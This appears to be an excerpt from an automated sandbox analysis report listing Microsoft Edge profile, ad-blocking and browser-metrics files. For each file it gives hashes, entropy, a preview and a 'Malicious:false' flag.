                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                Size (bytes):9258
                                                                                                                                                                                                                                                                                Entropy (8bit):5.597456783082936
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:RXqsNk5hvafxHQBYOsih/cIyURLl8Rotoes2neBZ2Vvl8xp66JkE11e4WJkechuB:IsNwhWHQTViRU0ZPxpnqE1okegkj57
                                                                                                                                                                                                                                                                                MD5:6649958579A9D08A9C02292DA2EBDB35
                                                                                                                                                                                                                                                                                SHA1:8B7B100B4A9974E1A3D4C9B8E3BBE86615B36316
                                                                                                                                                                                                                                                                                SHA-256:3B1CC6E568E5659932546F3561297D99403B2CA5196B8E26BE8E5A62DF67D8BC
                                                                                                                                                                                                                                                                                SHA-512:C81FC74FFEE876135D1B743116236245F4FD7D4BCE83F01701F8B09B115E82E2268D2724A8F819977836C57D31ECB673A2B58D2A326C70A6DF4EAABBE41AE6C1
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951549626514","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\67130e79-6856-4e26-8588-2895b0a1ced4.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8321
                                                                                                                                                                                                                                                                                Entropy (8bit):5.789774866173048
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:fsNwJHQKeiRUG3jZkea6qRAq1k8SPxVLZ7VTiB:fsNw5nzqea6q3QxVNZTiB
                                                                                                                                                                                                                                                                                MD5:818889B8B36351C83AA4A124B3C4D94B
                                                                                                                                                                                                                                                                                SHA1:42E354C9FC9FA1768D8DC99C9D7E47F9A5FF0AB0
                                                                                                                                                                                                                                                                                SHA-256:F3D0FED1AE689E14B4AC202CE3CAC289E2BBAD62DB84172DD06E4880D5E68102
                                                                                                                                                                                                                                                                                SHA-512:0B09DA484360A7049DC0373E548E9092C3E240A3BF42FE57963B9406AE15D9CD9D49BE299FF1B77418F18B006C8A9DC29434BEFE168FD9D72879A69D8D04DB19
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6fb25c77-e6b5-4f2b-a95e-ce8906da22c4.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24839
                                                                                                                                                                                                                                                                                Entropy (8bit):6.032766603624621
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:lMkbJ6eg6KzhXRLtkv1ulsj5qezgDXott:lMk16zRRSv1TWot
                                                                                                                                                                                                                                                                                MD5:7A98EBE409F786B4A4B77A26A06DB6B4
                                                                                                                                                                                                                                                                                SHA1:2595E73A235C063E5A48799CD6D18EB59DBFAB6D
                                                                                                                                                                                                                                                                                SHA-256:16889E1CD93ACE30AD8356A8E6DD80C889CD330D3F9E4BC14859B3C60022FDB3
                                                                                                                                                                                                                                                                                SHA-512:F75F8602BBDF8E019C14E58A2102B498E8F77EF0C224ED8482D69D651E46D3E4994A82F850EB91F86C471FF4A824F2D3925D06AFA5FABE0132EB7B67D6EE0CF3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951549626514","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\79cdac08-d18d-44fb-9a83-4fa7307de5df.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):22664
                                                                                                                                                                                                                                                                                Entropy (8bit):6.048060530400472
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:vtMkaMJH2m0engiVKzhSW3BLntNqVsNwhwhsqezE7DLjoksp3SY:lMkbJ6eg6KzhXRLtkV1usqezgDXott
                                                                                                                                                                                                                                                                                MD5:5E5D1DB8634E6556D0A576F43DF0B009
                                                                                                                                                                                                                                                                                SHA1:C1F1BAC93DB6DAD2C9BB8215D1366434E9B80C4F
                                                                                                                                                                                                                                                                                SHA-256:C6AF04CCC4783C94188C35CFB5311950266796D4D073307CDF93000D69319E74
                                                                                                                                                                                                                                                                                SHA-512:0F2B1CD52D8807A9C91D27499030472FB3FB7F7060F427FD18E508EE83A33F4FF74CA7ACA79E8EECF3B2FFEAF852D0CA621B8D3BD09628E22F6B263136AB4DE4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951549626514","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\6e6b9079-a500-4fb2-a331-f9287cbb791b.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                Entropy (8bit):4.640139629192622
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7d:fwUQC5VwBIiElEd2K57P7d
                                                                                                                                                                                                                                                                                MD5:2294BA025779C50628FDAB475ACD59D4
                                                                                                                                                                                                                                                                                SHA1:CCBCAA697CE1AA9F1DAF9D88C214CB51E4381787
                                                                                                                                                                                                                                                                                SHA-256:CA627CBA3701FC8C0358EF79F7E1AA9CED0B853FE8EE72389172BDED974C431B
                                                                                                                                                                                                                                                                                SHA-512:C700C8DEB0590992BB6210CDF3E34D0C6F94650525ABB23473D1FF32F8B38D89563C8319305E64FE45BBCB765E6FFD4A76E20127ED8D1C2297D5C3A67E2B971A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                Entropy (8bit):4.640139629192622
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7d:fwUQC5VwBIiElEd2K57P7d
                                                                                                                                                                                                                                                                                MD5:2294BA025779C50628FDAB475ACD59D4
                                                                                                                                                                                                                                                                                SHA1:CCBCAA697CE1AA9F1DAF9D88C214CB51E4381787
                                                                                                                                                                                                                                                                                SHA-256:CA627CBA3701FC8C0358EF79F7E1AA9CED0B853FE8EE72389172BDED974C431B
                                                                                                                                                                                                                                                                                SHA-512:C700C8DEB0590992BB6210CDF3E34D0C6F94650525ABB23473D1FF32F8B38D89563C8319305E64FE45BBCB765E6FFD4A76E20127ED8D1C2297D5C3A67E2B971A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD83B-20D8.pma

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                Entropy (8bit):0.03962229688878824
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:hk0EbtmqvDzKX7HJ8iD12absbZHtgbXGh8IYhHBNELi/cRQMcXZXn8y08Tcm2RGY:m0EtmlWCRhhxQKZX08T2RGOD
                                                                                                                                                                                                                                                                                MD5:BB9C2E3EC1AE4DB58926D2F0AB3873F9
                                                                                                                                                                                                                                                                                SHA1:9594588109A6BB36AE4C72500201FBE725B9E7DE
                                                                                                                                                                                                                                                                                SHA-256:D5C36BAFD3A7E1C6EDE4B6637D38DFD67FFCD2C8494BCA92FC5FE85C33354175
                                                                                                                                                                                                                                                                                SHA-512:9177964B16B50E7B4FA7BF49DC8B3667AB4C9F3B11DE4492670502957E4DDDEC7E32E21C069C7E8AB777D95849A8B506893AA3F87FE62091A50DC7CE24B0BD27
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@................a...P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....e.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".hqprhn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U.>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD83C-21D0.pma

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                Entropy (8bit):0.46002364362767767
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:hyahGfRjWqJdq/kRsnWw/F5qDWeaH1pE7:86qJ0k83
                                                                                                                                                                                                                                                                                MD5:A53C13EDB57AF110BACA576FAC2881EF
                                                                                                                                                                                                                                                                                SHA1:48063DD18FAEAE35BA4AB1D4D229106E2E375EC1
                                                                                                                                                                                                                                                                                SHA-256:3F9660591FA09A920E00BDBBA9A1877C64AE4B4F8138131C1F915A79E1E595A6
                                                                                                                                                                                                                                                                                SHA-512:14C280F2EB7F0243ED7A496496F3ABA01251DF242314F95110A7DD65E3EA9A0DA6A946BDC9DFAD3FC709BCE311BE7F9D92B0983DB4CA2B1E22F27083037F096E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....i.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".hqprhn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..$...

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD84D-1FF4.pma

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                Entropy (8bit):0.04072272989790062
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:pW038ZmqvDtKX7sJEa3XxxTxqZ/g+Xf970R6Eqh57NBCnG1gQMJodVn8y08Tcm2D:E0MZPeK8YKFhxACgFoH08T2RGOD
                                                                                                                                                                                                                                                                                MD5:28B676D8908FC67374FCF429A615D14C
                                                                                                                                                                                                                                                                                SHA1:4A310A15A4568EAB278A2867207AB86B9BDC1366
                                                                                                                                                                                                                                                                                SHA-256:499471B4086C8E62F759554D1AEEA628F6A7E46B64184698DA68461C1DA3FECE
                                                                                                                                                                                                                                                                                SHA-512:55D325E080906C8F48FE420B7BE2C9F384D983488E6F9B4C76743170F89725F601E449B5EA8C970649F7A6C250C4EF57FC8E489CEDC68EF3A921F478C8AC10EB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@................b...Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".hqprhn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD856-10B4.pma

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                Entropy (8bit):0.039537962422999534
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:o5038ZmqvDKKXmJLMo4sPqpRX/gg4rfh9rNE1CgL1gQMbSlBYD2n8y08Tcm2RGOD:i0MZa4osfmhFgRgPG908T2RGOD
                                                                                                                                                                                                                                                                                MD5:2601D410B535EB8351E887F4601365FD
                                                                                                                                                                                                                                                                                SHA1:7BA50A28E4EDD75F1EE387E4245F663E4878C88A
                                                                                                                                                                                                                                                                                SHA-256:5877BC2DCACA7163F0574E1ECC30620765DBCF777B196FAC664350FE20D86E86
                                                                                                                                                                                                                                                                                SHA-512:F9DE1078F73979992AA13DA1035FEDBE97B77CEAB95D76C8A9FAAA18FC8290EC3E80ECB20C11C68BEC123A64B643C788FEC8D726CE98AFDCBE6512E4D8908546
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@...............x_..0O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".hqprhn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                                Entropy (8bit):0.3553968406659012
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                                                                                                                                MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                                                                                                                                SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                                                                                                                                SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                                                                                                                                SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                                Entropy (8bit):3.060980776278344
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1J1:o1//BVsJDG2Yq
                                                                                                                                                                                                                                                                                MD5:74B32A83C9311607EB525C6E23854EE0
                                                                                                                                                                                                                                                                                SHA1:C345A4A3BB52D7CD94EA63B75A424BE7B52CFCD2
